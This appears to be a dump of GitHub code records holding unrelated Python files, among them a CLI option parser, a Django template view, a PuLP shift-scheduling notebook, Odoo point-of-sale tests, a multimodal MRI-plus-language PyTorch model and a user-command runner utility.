Action.index,\n}\n\n\nclass FrontendType(Enum):\n batch = 1\n yes = 2\n cli = 3\n gtk = 4\n\n\nclass Option:\n def __init__(self, short: str, long: str):\n self.short = short\n self.long = long\n\n def matches(self, arg: str) -> bool:\n return arg == self.short or arg == self.long\n\n\nclass ParseError(Exception):\n def __init__(self, msg: str):\n self.msg = msg\n\n\nclass RunOptions:\n def __init__(self, args: List[str]):\n \"\"\"\n :raises ParseError if the provided args are invalid\n \"\"\"\n self.action: Action = None\n self.tags: List[str] = []\n self.files: List[str] = []\n self.match_type: MatchType = MatchType.all\n self.frontend: FrontendType = None\n self._parse(args)\n self._check_action_type()\n self._check_files_count()\n if self.frontend is None:\n self.frontend = FrontendType.cli\n\n def _parse(self, args: List[str]):\n parsing_stage = ParsingStage.action\n\n while len(args) > 0:\n arg = args.pop(0)\n\n if parsing_stage == ParsingStage.tags and _requires_files(self.action) and len(args) == 0:\n parsing_stage = ParsingStage.files\n\n if _is_option(arg):\n if Option(\"-f\", \"--files\").matches(arg):\n parsing_stage = ParsingStage.files\n elif Option(\"-F\", \"--frontend\").matches(arg):\n self.frontend = _parse_frontend_type(args)\n elif Option(\"-m\", \"--match-type\").matches(arg):\n self.match_type = _parse_match_type(args)\n else:\n raise ParseError(\"Unknown option \"+arg)\n elif parsing_stage == ParsingStage.action:\n self.action = _parse_action(arg)\n if self.needs_tags():\n parsing_stage = ParsingStage.tags\n else:\n parsing_stage = ParsingStage.files\n elif parsing_stage == ParsingStage.tags:\n self.tags.append(arg)\n elif parsing_stage == ParsingStage.files:\n self.files.append(arg)\n\n def needs_tags(self) -> bool:\n if len(self.tags) > 0:\n return False\n return self.action in [Action.query, Action.tag, Action.untag]\n\n def allows_tag_creation(self) -> bool:\n return self.action == Action.tag\n\n def _check_action_type(self):\n if self.action is None:\n raise ParseError(\"Action type must be specified!\")\n\n def _check_files_count(self):\n actual_file_count = len(self.files)\n\n if self.action in [Action.list, Action.tag, Action.untag, Action.clear, Action.index] and actual_file_count < 1:\n raise ParseError(\"Unexpected files count \" + str(actual_file_count) +\n \" (expected 1 or more) for action type \\\"\" + self.action.name + \"\\\"\")\n elif self.action == Action.query and actual_file_count > 0:\n raise ParseError(\"Unexpected files count \" + str(actual_file_count) +\n \" (expected 0) for action type \\\"\" + self.action.name + \"\\\"\")\n\n\ndef _parse_match_type(args):\n if len(args) == 0:\n raise ParseError(\"Argument missing for option --match-type!\")\n return MatchType[args.pop(0)]\n\n\ndef _parse_frontend_type(args):\n if len(args) == 0:\n raise ParseError(\"Argument missing for option --frontend!\")\n try:\n return FrontendType[args.pop(0)]\n except KeyError:\n raise ParseError(\"Invalid frontend type \" + args.pop(0))\n\n\ndef _parse_action(action_name):\n if action_name in _short_actions:\n return _short_actions[action_name]\n else:\n try:\n return Action[action_name]\n except KeyError:\n raise ParseError(\"Invalid action type: \" + action_name)\n\n\ndef _is_option(arg: str):\n return arg.startswith(\"-\")\n\n\ndef _requires_files(action):\n return action in [Action.list, Action.tag, Action.untag, Action.clear, Action.index]\n\n\n","repo_name":"enguerrand/tie","sub_path":"lib/options_parser.py","file_name":"options_parser.py","file_ext":"py","file_size_in_byte":8096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"16349995449","text":"from django.views.generic import TemplateView\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.db import connection\n\nfrom lib.common import AppUtil\n\nclass HomeView(LoginRequiredMixin, TemplateView):\n template_name = 'home.html'\n\n # パラメータによってテンプレートを変更する\n def get_template_names(self):\n\n # アプリケーション名取得\n if \"app_name\" in self.request.GET:\n app_name = self.request.GET.get(\"app_name\")\n else:\n app_name = \"base\"\n\n # テンプレート名取得\n if \"template_name\" in self.request.GET:\n template_name = app_name + \"/\" + self.request.GET.get(\"template_name\") + \".html\"\n else:\n template_name = \"home.html\"\n \n return [template_name]\n\n @staticmethod\n def dictfetchall(cursor):\n columns = [col[0] for col in cursor.description]\n return [\n dict(zip(columns, row))\n for row in cursor.fetchall()\n ]\n\n #変数を渡す\n def get_context_data(self,**kwargs):\n context = super().get_context_data(**kwargs)\n\n # アプリケーション名取得\n if \"app_name\" in self.request.GET:\n app_name = self.request.GET.get(\"app_name\")\n else:\n app_name = \"base\"\n\n # テンプレート名取得\n if \"template_name\" in self.request.GET:\n template_name = self.request.GET.get(\"template_name\")\n else:\n template_name = \"home\"\n\n # パラメータで指定されたSQLを実行し結果を取得する\n with connection.cursor() as cursor:\n sql = AppUtil.get_sql(app_name, template_name)\n cursor.execute(sql)\n items = HomeView.dictfetchall(cursor)\n \n context[\"items\"] = items\n\n return context\n","repo_name":"nissato-hitoshi/docker-django_mysql","sub_path":"src/base/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"38972236394","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[16]:\n\n\nget_ipython().system(' pip install pulp')\n\n\n# In[17]:\n\n\nimport pandas as pd\nfrom pulp import *\nimport matplotlib.pyplot as plt\nfrom itertools import chain, repeat\n\n\n# In[18]:\n\n\ndef ncycles(iterable, n):\n \"Returns the sequence elements n times\"\n return chain.from_iterable(repeat(tuple(iterable), n))\n\n\n# In[19]:\n\n\nn_staff = [31, 45, 40, 40, 48, 30, 25]\njours = ['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday']\n\n# Staff\ndf_staff = pd.DataFrame({'Days': jours, 'Staff Demand':n_staff})\ndf_staff[['Days', 'Staff Demand']].plot.bar(x='Days', figsize = (30, 10), fill=True, color='black')\nplt.title('Workforce Ressources Demand by Day')\nplt.xlabel('Day of the week')\nplt.ylabel('Number of Workers')\nplt.show()\n\n\n# In[20]:\n\n\n# Create circular list of days\nn_days = [i for i in range(7)]\nn_days_c = list(ncycles(n_days, 3)) \n\n# Working days\nlist_in = [[n_days_c[j] for j in range(i , i + 5)] for i in n_days_c]\n\n# Days off\nlist_excl = [[n_days_c[j] for j in range(i + 1, i + 3)] for i in n_days_c]\n\n\n# In[21]:\n\n\n# The class has been initialize, and x, and days defined\nmodel = LpProblem(\"Minimize Staffing\", LpMinimize)\n\n# Create Variables\nstart_jours = ['Shift: ' + i for i in jours]\nx = LpVariable.dicts('shift_', n_days, lowBound=0, cat='Integer')\n\n# Define Objective\nmodel += lpSum([x[i] for i in n_days])\n\n# Add constraints\nfor d, l_excl, staff in zip(n_days, list_excl, n_staff):\n model += lpSum([x[i] for i in n_days if i not in l_excl]) >= staff\n\n# Solve Model\nmodel.solve()\n\n# The status of the solution is printed to the screen\nprint(\"Status:\", LpStatus[model.status])\n\n\n# In[22]:\n\n\n# How many workers per day ?\ndct_work = {}\ndico_work = {}\nfor v in model.variables():\n dct_work[int(v.name[-1])] = int(v.varValue)\n dico_work[v.name] = int(v.varValue)\ndico_work\n\n\n# In[23]:\n\n\n# Show workers schedule\ndict_sch = {}\nfor day in dct_work.keys():\n dict_sch[day] = [dct_work[day] if i in list_in[day] else 0 for i in n_days]\ndf_sch = pd.DataFrame(dict_sch).T\ndf_sch.columns = jours\ndf_sch.index = start_jours\n# The optimized objective function value is printed to the screen\nprint(\"Total number of Staff = \", pulp.value(model.objective))\n\n\n# In[24]:\n\n\n# Detailed\ndf_sch\n\n\n# In[25]:\n\n\n# Sum by day\ndf_sch.sum(axis =0)\n\n\n# In[26]:\n\n\ndf_supp = df_staff.copy().set_index('Days')\ndf_supp['Staff Supply'] = df_sch.sum(axis = 0)\ndf_supp['Extra_Ressources'] = df_supp['Staff Supply'] - df_supp['Staff Demand']\ndf_supp.to_csv('test.csv')\n\n\n# In[27]:\n\n\n# Staff\nax = df_supp.plot.bar(y=['Staff Demand', 'Staff Supply'], figsize = (30, 10), fill=True, color=['black', 'red'])\ndf_supp.plot(y=['Extra_Ressources'], color=['blue'], secondary_y = True, ax = ax, linewidth = 3)\nplt.title('Workforce: Demand vs. Supply')\nplt.xlabel('Day of the week')\nplt.ylabel('Number of Workers')\nplt.show()\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"PeddintiRajshekhar/Project-1","sub_path":"project 1.py","file_name":"project 1.py","file_ext":"py","file_size_in_byte":2886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"70748574491","text":"from typing import List, Union\n\nfrom pydantic import BaseModel\n\nclass User(BaseModel):\n authtoken: str\n refreshtoken: str\n idtoken: str\n admin_id: int\n app_id: int\n action: str\n chain_id: int\n lang: str\n class Config:\n from_attributes = True\n\n\n","repo_name":"rob-vandam/baseProject","sub_path":"app/schemas.py","file_name":"schemas.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"22966115103","text":"n = int(input())\nlistA = list(map(int, input().split()))\n\nmemo = {}\n\ndef solve(mon, i, haveN):\n key = str(mon) + \" \" + str(i) + \" \" + str(haveN)\n if key in memo:\n return memo[key]\n if i >= len(listA):\n memo[key] = 0\n return memo[key]\n elif i == len(listA)-1:\n mon+=haveN*listA[i]\n haveN=0\n memo[key] = mon\n return memo[key]\n else:\n memo[key] = max(solve(mon, i+1, haveN), solve(mon-listA[i]*(mon//listA[i]), i+1, haveN+mon//listA[i]), solve(mon+haveN*listA[i], i+1, 0))\n return memo[key]\n \nprint(solve(1000, 0, 0))\n \n","repo_name":"p623/programming_contest","sub_path":"mSolution/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"22938112287","text":"from datetime import datetime\n\nfrom odoo import fields\nfrom odoo.tests import SavepointCase\n\n\nclass TestL10nBrPosOrder(SavepointCase):\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n cls.env.company = cls.env.ref(\"l10n_br_base.empresa_lucro_presumido\")\n cls.pos_config = cls.env.ref(\"l10n_br_pos.pos_config_presumido\")\n cls.cash_payment_method = cls.env.ref(\"l10n_br_pos.presumido_dinheiro\")\n cls.led_lamp = cls.env[\"product.product\"].create(\n {\n \"name\": \"LED Lamp\",\n \"available_in_pos\": True,\n \"list_price\": 0.90,\n }\n )\n\n def compute_tax(self, product, price, qty=1, taxes=None):\n if not taxes:\n taxes = product.taxes_id.filtered(\n lambda t: t.company_id.id == self.env.company.id\n )\n currency = self.pos_config.pricelist_id.currency_id\n res = taxes.compute_all(price, currency, qty, product=product)\n untax = res[\"total_excluded\"]\n return untax, sum(tax.get(\"amount\", 0.0) for tax in res[\"taxes\"])\n\n def _generate_order(self):\n current_session = self.pos_config.current_session_id\n untax, atax = self.compute_tax(self.led_lamp, 0.9)\n generic_order = {\n \"data\": {\n \"amount_paid\": untax + atax,\n \"amount_return\": 0,\n \"amount_tax\": atax,\n \"amount_total\": untax + atax,\n \"creation_date\": fields.Datetime.to_string(fields.Datetime.now()),\n \"fiscal_position_id\": False,\n \"pricelist_id\": self.pos_config.available_pricelist_ids[0].id,\n \"lines\": [\n [\n 0,\n 0,\n {\n \"discount\": 0,\n \"id\": 42,\n \"pack_lot_ids\": [],\n \"price_unit\": 0.9,\n \"product_id\": self.led_lamp.id,\n \"price_subtotal\": 0.9,\n \"price_subtotal_incl\": 1.04,\n \"qty\": 1,\n \"tax_ids\": [(6, 0, self.led_lamp.taxes_id.ids)],\n },\n ]\n ],\n \"name\": \"Order 00042-003-0014\",\n \"partner_id\": False,\n \"pos_session_id\": current_session.id,\n \"sequence_number\": 2,\n \"statement_ids\": [\n [\n 0,\n 0,\n {\n \"amount\": untax + atax,\n \"name\": fields.Datetime.now(),\n \"payment_method_id\": self.cash_payment_method.id,\n },\n ]\n ],\n \"uid\": \"00042-003-0014\",\n \"user_id\": self.env.uid,\n },\n \"id\": \"00042-003-0014\",\n \"to_invoice\": False,\n \"authorization_date\": datetime.fromisoformat(\"2022-01-01T12:00:00\"),\n \"document_number\": \"123456\",\n \"document_key\": \"Cfe35181104113837000100590001128550021551657445\",\n \"document_type_id\": 33,\n \"document_session_number\": 123456,\n \"document_serie\": \"123456789\",\n \"fiscal_operation_id\": 1,\n \"status_code\": \"06000\",\n \"status_name\": \"Autorizado o Uso do CF-e\",\n \"state_edoc\": \"autorizada\",\n }\n self.env[\"pos.order\"].create_from_ui([generic_order])\n\n def test_create_from_ui_l10n_brazil(self):\n orders_exported_to_ui = []\n\n self.pos_config.open_session_cb(check_coa=False)\n\n current_session = self.pos_config.current_session_id\n num_starting_orders = len(current_session.order_ids)\n\n self._generate_order()\n\n for order in current_session.order_ids:\n orders_exported_to_ui.append(order.export_for_ui())\n\n self.assertEqual(\n num_starting_orders + 1,\n len(current_session.order_ids),\n \"Submitted order not encoded\",\n )\n\n self.assertEqual(\n 1,\n len(orders_exported_to_ui),\n \"Orders not exported to UI.\",\n )\n\n def test_cancel_l10n_brazil(self):\n self.pos_config.open_session_cb(check_coa=False)\n current_session = self.pos_config.current_session_id\n num_starting_orders = len(current_session.order_ids)\n\n self._generate_order()\n order = current_session.order_ids[0]\n\n order_data = {\n \"order_id\": order.id,\n \"numSessao\": 123456,\n \"chave_cfe\": \"Cfe35181104113837000100590001128550021551657445\",\n \"xml\": \"dGVzdGVfY2FuY2VsX2Zsb3c=\",\n }\n order.cancel_order(order_data)\n self.assertEqual(\n num_starting_orders + 2,\n len(current_session.order_ids),\n \"Cancelled order not encoded\",\n )\n","repo_name":"OCA/l10n-brazil","sub_path":"l10n_br_pos/tests/test_l10n_br_pos_order.py","file_name":"test_l10n_br_pos_order.py","file_ext":"py","file_size_in_byte":5055,"program_lang":"python","lang":"en","doc_type":"code","stars":196,"dataset":"github-code","pt":"32"}
+{"seq_id":"30892006328","text":"import logging\n\nfrom django.db import migrations\n\nlogger = logging.getLogger(__name__)\n\n\ndef init_source_type_specs(apps, schema_editor):\n \"\"\"初始化代码库配置(BareGit, BaseSVN)\"\"\"\n SourceTypeSpecConfig = apps.get_model('sourcectl', 'SourceTypeSpecConfig')\n\n logger.info(\"初始化 BareGit 代码库配置\")\n SourceTypeSpecConfig.objects.create(\n name='bare_git', label_en='BareGit', label_zh_cn='原生 Git', enabled=True,\n spec_cls='paasng.platform.sourcectl.type_specs.BareGitSourceTypeSpec'\n )\n\n logger.info(\"初始化 BareSVN 代码库配置\")\n SourceTypeSpecConfig.objects.create(\n name='bare_svn', label_en='BareSVN', label_zh_cn='原生 SVN', enabled=True,\n spec_cls='paasng.platform.sourcectl.type_specs.BareSvnSourceTypeSpec'\n )\n logger.info(\"初始化代码库配置完成\")\n\n\nclass Migration(migrations.Migration):\n dependencies = [\n ('sourcectl', '0006_sourcetypespecconfig'),\n ]\n\n operations = [\n migrations.RunPython(init_source_type_specs),\n ]\n","repo_name":"TencentBlueKing/blueking-paas","sub_path":"apiserver/paasng/paasng/platform/sourcectl/migrations/0007_init_source_type_specs.py","file_name":"0007_init_source_type_specs.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","stars":134,"dataset":"github-code","pt":"32"}
+{"seq_id":"40304932336","text":"import torch\nfrom torch import nn\nfrom pytorch_lightning.core.module import LightningModule\nfrom torch.nn import functional as F\nfrom monai.networks.nets import resnet10, resnet18, resnet34, resnet50\nfrom settings import IMAGE_SIZE, FEATURES, BATCH_SIZE, TARGET\nimport torchmetrics\nimport pandas as pd\nfrom transformers import AutoTokenizer, AutoModel\nimport os\n\nos.environ[\"TOKENIZERS_PARALLELISM\"] = \"false\"\n\n\nclass MultiModModelWithLanguage(LightningModule):\n '''\n Resnet Model Class including the training, validation and testing steps\n '''\n\n def __init__(self, class_weight, scaler):\n\n super().__init__()\n\n self.class_weight = class_weight\n\n self.scaler = scaler\n\n self.resnet = resnet10(pretrained=False,\n spatial_dims=3,\n num_classes=120,\n n_input_channels=1\n )\n\n self.tokenizer = AutoTokenizer.from_pretrained('michiyasunaga/BioLinkBERT-base',\n cache_dir=\"/scratch/users/paschali/\")\n self.language_model = AutoModel.from_pretrained('michiyasunaga/BioLinkBERT-base',\n cache_dir=\"/scratch/users/paschali/\")\n \n # Freeze weights so those don't get trained \n for param in self.language_model.parameters():\n param.requires_grad = False\n\n\n self.NUM_FEATURES = len(FEATURES)\n\n # self.NUM_FEATURES = 0\n\n # fc layer to make image size same as tabular data size\n # self.fc = nn.Linear(400, 1)\n\n # combine resnet with final fc layer\n # self.imagenet = nn.Sequential(self.resnet, self.fc)\n # fc layer that maps language model inputs to smaller dimension\n self.language_fc = nn.Linear(768, 120)\n\n # fc layer for tabular data. We substract 2 because age and sex are encoded as sentences\n self.fc1 = nn.Linear((self.NUM_FEATURES - 2), 120)\n\n # first fc layer which takes concatenated input\n self.fc2 = nn.Linear((120 + 120 + 120), 32)\n\n # final fc layer which takes concatenated imput\n self.fc3 = nn.Linear(32, 1)\n\n self.train_macro_accuracy = torchmetrics.Accuracy(task='multiclass', average='macro', num_classes=2)\n\n self.val_macro_accuracy = torchmetrics.Accuracy(task='multiclass', average='macro', num_classes=2)\n\n self.test_macro_accuracy = torchmetrics.Accuracy(task='multiclass', average='macro', num_classes=2)\n\n self.train_accuracy = torchmetrics.Accuracy(task='multiclass', average='micro', num_classes=2)\n\n self.val_accuracy = torchmetrics.Accuracy(task='multiclass', average='micro', num_classes=2)\n\n self.test_accuracy = torchmetrics.Accuracy(task='multiclass', average='micro', num_classes=2)\n\n self.results_column_names = ['subject', 'label', 'prediction', 'age', 'sex']\n\n self.train_results_df = pd.DataFrame(columns=self.results_column_names)\n\n self.train_results_df_all = pd.DataFrame(columns=self.results_column_names)\n\n self.val_results_df_all = pd.DataFrame(columns=self.results_column_names)\n\n self.val_results_df = pd.DataFrame(columns=self.results_column_names)\n\n def forward(self, img, tab):\n \"\"\"\n\n x is the input data\n\n \"\"\"\n # run the model for the image\n self.language_model = self.language_model.to('cuda')\n # self.tokenizer = self.tokenizer\n \n # print(img.shape)\n img = torch.unsqueeze(img, 1)\n img = img.to(torch.float32)\n # print(img.type)\n # print(img.shape)\n img = self.resnet(img)\n \n batch_sentences = self.get_batch_sentences(tab)\n \n # change the dtype of the tabular data\n tab = tab.to(torch.float32)\n \n ind_to_keep = list(range(0, self.NUM_FEATURES))\n\n ind_to_keep.remove(2)\n\n ind_to_keep.remove(3)\n\n # Remove age and sex from tabular vector since we are using them as language model input\n tab_without_age_sex = tab[:,ind_to_keep]\n \n # forward tabular data\n tab_without_age_sex = F.relu(self.fc1(tab_without_age_sex))\n\n language_inputs = self.tokenizer(batch_sentences, return_tensors=\"pt\")\n \n language_inputs = language_inputs.to('cuda')\n\n language_outputs = self.language_model(**language_inputs)\n\n # 1 x 768\n # We \"pool\" the model by simply taking the hidden state corresponding\n # to the first token. We assume that this has been pre-trained\n pooled_states = language_outputs.pooler_output\n\n language_features_compressed = self.language_fc(pooled_states)\n\n # concat image, tabular data and data from language model\n x = torch.cat((img, tab_without_age_sex, language_features_compressed), dim=1)\n\n x = F.relu(self.fc2(x))\n\n out = self.fc3(x)\n\n out = torch.squeeze(out)\n\n return out\n\n def get_batch_sentences(self, tabular_to_encode):\n # return_tensors pt means pytorch\n tabular_to_encode = self.scaler.inverse_transform(tabular_to_encode.detach().cpu().numpy())\n\n batch_age = tabular_to_encode[:, 2]\n batch_sex = tabular_to_encode[:, 1]\n\n batch_sex_l = list(batch_sex)\n batch_age_l = list(batch_age.round(2))\n\n batch_sex_l = list(map(lambda x: 'female' if x == 0 else 'male', batch_sex_l))\n\n batch_pairs = list(zip(batch_sex_l, batch_age_l))\n\n batch_sentences = [\"This subject is \" + pair[0] + \" and \" + str(pair[1]) + \" years old\" for pair in batch_pairs]\n\n return batch_sentences\n\n def configure_optimizers(self):\n\n optimizer = torch.optim.Adam(self.parameters(), lr=1e-3)\n\n scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer, milestones=[10, 20, 35, 50], gamma=0.8)\n\n lr_scheduler = {\n 'scheduler': scheduler,\n 'name': 'lr_logging'\n }\n\n return [optimizer], [lr_scheduler]\n\n def training_step(self, batch, batch_idx):\n\n img, tab, y, subject_id = batch\n\n # img = torch.tensor(img).float()\n\n y = y.to(torch.float32)\n\n y_pred = self(img, tab)\n\n loss_func = torch.nn.BCEWithLogitsLoss(pos_weight=torch.tensor(self.class_weight).float())\n\n loss = loss_func(y_pred, y.squeeze())\n\n y_pred_tag = torch.round(torch.sigmoid(y_pred))\n\n self.train_results_df['subject'] = tuple(subject_id)\n self.train_results_df['label'] = y.squeeze().detach().cpu().numpy()\n self.train_results_df['prediction'] = y_pred_tag.detach().cpu().numpy()\n\n tab_bef_normalization = self.scaler.inverse_transform(tab.detach().cpu().numpy())\n self.train_results_df['age'] = tab_bef_normalization[:, 2]\n self.train_results_df['sex'] = tab_bef_normalization[:, 1]\n\n self.train_results_df_all = pd.concat([self.train_results_df_all, self.train_results_df], ignore_index=True)\n\n if BATCH_SIZE == 1:\n self.train_accuracy(torch.unsqueeze(y_pred_tag, 0), y)\n\n self.train_macro_accuracy(torch.unsqueeze(y_pred_tag, 0), y)\n else:\n self.train_accuracy(y_pred_tag, y)\n\n self.train_macro_accuracy(y_pred_tag, y)\n\n self.log('train_acc_step', self.train_accuracy, on_step=False, on_epoch=True)\n self.log('train_macro_acc_step', self.train_macro_accuracy, on_step=True, on_epoch=True)\n # Log loss\n self.log('train_loss', loss, on_step=True, on_epoch=True)\n\n return loss\n\n def validation_step(self, batch, batch_idx):\n\n img, tab, y, subject_id = batch\n y = y.to(torch.float32)\n\n y_pred = self(img, tab)\n\n loss_func = torch.nn.BCEWithLogitsLoss(pos_weight=torch.tensor(self.class_weight).float())\n\n loss = loss_func(y_pred, y.squeeze())\n y_pred_tag = torch.round(torch.sigmoid(y_pred))\n\n self.val_results_df['subject'] = tuple(subject_id)\n self.val_results_df['label'] = y.squeeze().detach().cpu().numpy()\n self.val_results_df['prediction'] = y_pred_tag.detach().cpu().numpy()\n\n tab_bef_normalization = self.scaler.inverse_transform(tab.detach().cpu().numpy())\n self.val_results_df['age'] = tab_bef_normalization[:, 2]\n self.val_results_df['sex'] = tab_bef_normalization[:, 1]\n\n self.val_results_df_all = pd.concat([self.val_results_df_all, self.val_results_df], ignore_index=True)\n\n if BATCH_SIZE == 1:\n\n self.val_accuracy(torch.unsqueeze(y_pred_tag, 0), y)\n\n self.val_macro_accuracy(torch.unsqueeze(y_pred_tag, 0), y)\n else:\n self.val_accuracy(y_pred_tag, y)\n\n self.val_macro_accuracy(y_pred_tag, y)\n\n self.log('val_acc_step', self.val_accuracy, on_step=False, on_epoch=True)\n self.log('val_macro_acc_step', self.val_macro_accuracy, on_step=True, on_epoch=True)\n\n # Log loss\n self.log('val_loss', loss, on_step=True, on_epoch=True)\n\n return loss\n\n def test_step(self, batch, batch_idx):\n\n img, tab, y, subject_id = batch\n y = y.to(torch.float32)\n\n y_pred = self(img, tab)\n\n loss_func = torch.nn.BCEWithLogitsLoss(pos_weight=torch.tensor(self.class_weight).float())\n\n loss = loss_func(y_pred,\n y.squeeze()) # loss = F.binary_cross_entropy(torch.sigmoid(y_pred), y.squeeze(), pos_weights = )\n\n y_pred_tag = torch.round(torch.sigmoid(y_pred))\n\n if BATCH_SIZE == 1:\n\n self.test_accuracy(torch.unsqueeze(y_pred_tag, 0), y)\n\n self.test_macro_accuracy(torch.unsqueeze(y_pred_tag, 0), y)\n else:\n self.test_accuracy(y_pred_tag, y)\n\n self.test_macro_accuracy(y_pred_tag, y)\n\n self.log('test_acc_step', self.test_accuracy, on_step=True, on_epoch=False)\n self.log('test_macro_acc_step', self.test_macro_accuracy, on_step=True, on_epoch=True)\n\n self.log(\"test loss\", loss)\n\n return loss\n\n def training_epoch_end(self, outs):\n\n filename_out = '/home/users/paschali/results/train_out_language_' + str(\n self.current_epoch) + '_' + TARGET + '_' + self.trainer.logger.experiment.name + '.csv'\n\n self.train_results_df_all.to_csv(filename_out)\n\n # Clear the dataframe so the new epoch can start fresh\n self.train_results_df_all = pd.DataFrame(columns=self.results_column_names)\n # log epoch metric\n self.log('train_acc_epoch', self.train_accuracy)\n self.log('train_macro_acc_epoch', self.train_macro_accuracy)\n\n def validation_epoch_end(self, outputs):\n # log epoch metric\n\n filename_out = '/home/users/paschali/results/val_out_language_' + str(\n self.current_epoch) + '_' + TARGET + '_' + self.trainer.logger.experiment.name + '.csv'\n\n self.val_results_df_all.to_csv(filename_out)\n\n # Clear the dataframe so the new epoch can start fresh\n self.val_results_df_all = pd.DataFrame(columns=self.results_column_names)\n\n self.log('val_acc_epoch', self.val_accuracy)\n self.log('val_macro_acc_epoch', self.val_macro_accuracy)\n\n","repo_name":"MaggiePas/NCANDA_Contrastive","sub_path":"multimodal/model_language.py","file_name":"model_language.py","file_ext":"py","file_size_in_byte":11222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"72162909850","text":"from ..Config import Configuration\nfrom ..commander import Commander\nfrom ..pretty_term import cprint\n\nclass WakeUp:\n \"\"\"Manage and run user defined commands from a single source\"\"\"\n def __init__(self, **kwargs):\n super().__init__()\n self.section_name = 'WAKEUP'\n self.config = Configuration()\n self._setup_check()\n\n def _create_default(self):\n self.config.set_entry(self.section_name, 'default', '0', True, False)\n self.config.set_entry(self.section_name, '0', \"echo 'Running default commands:'\", True, True)\n # If there were no errors in the previous lines then this should not error.\n err, sect = self.config.get_section(self.section_name)\n\n def _setup_check(self):\n \"\"\"Check that this has been setup, if not create defaults.\"\"\"\n err, sect = self.config.get_section(self.section_name)\n if err or 'default' not in sect:\n self._create_default()\n\n def get_config(self):\n err, sect = self.config.get_section(self.section_name)\n if err:\n self._create_default()\n return sect\n\n def _run_command(self, cmd, timeout):\n return Commander.run(\n cmd.get('command'),\n cmd.get('op_name', 'User command'),\n cmd.get('path'),\n cmd.get('env'),\n timeout)\n\n def _clean_command(self, cmd_string):\n # prevent recursion?\n if 'wakeup' in cmd_string or 'wake_up.py' in cmd_string:\n raise Exception(\"Sorry cannot run commands with 'wakeup' or 'wake_up.py' in order to prevent recursive behavior.\")\n else:\n # The _run_command function(from Commander.run) requires that the command be a list of strings \n return cmd_string.split(' ')\n\n def _process_command(self, cmd_key, timeout, config):\n # Runs an individual command\n if config.get(cmd_key):\n # clean and make sure the command is safe?\n clean_cmd = self._clean_command(config.get(cmd_key))\n # Set the operation name\n # Pre-append fungrams_wakeup so user can know it was run from this module\n op_name = f\"fungrams_wakup : {cmd_key}\"\n # run the command\n retcode = self._run_command({'command': clean_cmd, 'op_name': op_name}, timeout)\n if retcode == 0:\n cprint(f\"{cmd_key} : completed!\", 'bold', 'green')\n else:\n cprint(f\"{cmd_key} : failed with code {retcode}\", 'bold', 'light_red')\n else:\n raise Exception(f\"Error: Could not found find {cmd_key}\")\n\n def process_single_command(self, cmd_key, timeout):\n cmds_object = self.get_config()\n self._process_command(cmd_key, timeout, cmds_object)\n\n def process_group_command(self, group_key, timeout):\n # Runs a command group which is just an ordered string of command keys separated with semicolons\n cmds_object = self.get_config()\n if cmds_object.get(group_key):\n # command group should be separated with semicolons\n cmds = cmds_object.get(group_key).split(';')\n for cmd in cmds:\n # prevent recursion, but this wouldn't work anyways bc it would be improperly parsed\n if cmd == group_key:\n continue\n self._process_command(cmd, timeout, cmds_object)\n else:\n raise Exception(f\"Error: Command {group_key} not found in config {list(cmds_object.keys())}\")\n\n def add_command(self, cmd_key, cmd_string, overwrite=False, immediate_update=True):\n if ';' in cmd_key:\n raise Exception(\"No Semicolons are allowed in the command name.\")\n clean_cmd = self._clean_command(cmd_string)\n clean_string = ' '.join([_ for _ in clean_cmd])\n # Returns: (is_error, response)\n return self.config.set_entry(self.section_name, cmd_key, clean_string, overwrite, immediate_update)\n\n def add_group_command(self, group_key, cmds_list, overwrite=False, immediate_update=True):\n if ';' in group_key:\n raise Exception(\"No Semicolons are allowed in the group command name.\")\n group_config = self.get_config()\n for cmd_key in cmds_list:\n if cmd_key not in group_config:\n raise Exception(f\"Error: Could not find command {cmd_key}\")\n if ';' in cmd_key:\n raise Exception(\"No Semicolons are allowed in the command name.\")\n cmds_string = ';'.join([_ for _ in cmds_list])\n return self.config.set_entry(self.section_name, group_key, cmds_string, overwrite, immediate_update)\n\n","repo_name":"deadmau6/fungrams","sub_path":"Services/WakeUp/wake_up.py","file_name":"wake_up.py","file_ext":"py","file_size_in_byte":4630,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"2888312867","text":"import numpy as np\n\n# single class CE\n\ndef cross_entropy(Y, P):\n Y = np.float_(Y)\n P = np.float_(P)\n return -np.sum(Y * np.log(P) + (1 - Y) * np.log(1 - P))\n\n# multi-class CE\n\n","repo_name":"chen2018k/DL","sub_path":"intro_NN/cross-entropy.py","file_name":"cross-entropy.py","file_ext":"py","file_size_in_byte":185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
